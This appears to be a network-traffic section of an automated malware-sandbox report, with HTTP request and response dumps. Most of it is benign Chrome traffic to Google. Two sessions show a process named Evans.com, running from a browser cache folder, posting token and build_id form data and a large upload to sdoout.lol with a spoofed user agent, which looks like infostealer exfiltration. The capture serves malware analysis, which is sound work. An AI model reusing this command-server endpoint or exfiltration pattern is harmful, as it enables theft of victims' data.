                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC916INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                                                                                    Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                                                                                    Content-Length: 117446
                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                    Server: sffe
                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 16:58:49 GMT
                                                                                                                                                                                                                                                                                                                                    Expires: Sun, 28 Dec 2025 16:58:49 GMT
                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                    Age: 229649
                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC474INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
                                                                                                                                                                                                                                                                                                                                    Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC1390INData Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b
                                                                                                                                                                                                                                                                                                                                    Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC1390INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28
                                                                                                                                                                                                                                                                                                                                    Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC1390INData Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69
                                                                                                                                                                                                                                                                                                                                    Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC1390INData Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                                                                                                    Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC1390INData Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c
                                                                                                                                                                                                                                                                                                                                    Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC1390INData Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45
                                                                                                                                                                                                                                                                                                                                    Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC1390INData Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC1390INData Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ction(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.n
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC1390INData Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("S


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    16192.168.2.550016142.250.186.464436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC726OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: play.google.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Content-Length: 913
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                    Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:19 UTC913OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 35 36 33 34 37 37 37 36 39 37 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                                                                    Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1735634777697",null,null,null,
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:20 UTC941INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: NID=520=chJCRTLCN7iLr9x6s3I7zkf-dusBI1WYSyj9ey-MYSp9xu-lRTjx1T8WiO1IqNblZFnsdA62HxmB2dGuXtWoY4a7-hU4EjE8UYu1OnoRqI-LoyKNhTDJBxggQDOt4926-mSxp7lvMfEQb6YIuwbVCuVL1j-ZfWSNlrdn7LnZfEg2HfhjThf3eX4; expires=Wed, 02-Jul-2025 08:46:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:19 GMT
                                                                                                                                                                                                                                                                                                                                    Server: Playlog
                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                    Expires: Tue, 31 Dec 2024 08:46:19 GMT
                                                                                                                                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:20 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    17192.168.2.550019116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:20 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----aimyc26xlx4wbiwt0r1d
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 505
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:20 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 61 69 6d 79 63 32 36 78 6c 78 34 77 62 69 77 74 30 72 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 61 69 6d 79 63 32 36 78 6c 78 34 77 62 69 77 74 30 72 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 61 69 6d 79 63 32 36 78 6c 78 34 77 62 69 77 74 30 72 31 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------aimyc26xlx4wbiwt0r1dContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------aimyc26xlx4wbiwt0r1dContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------aimyc26xlx4wbiwt0r1dCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:20 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    18192.168.2.550024116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----gvk6phlxtj5p8q1ny58y
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 213453
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
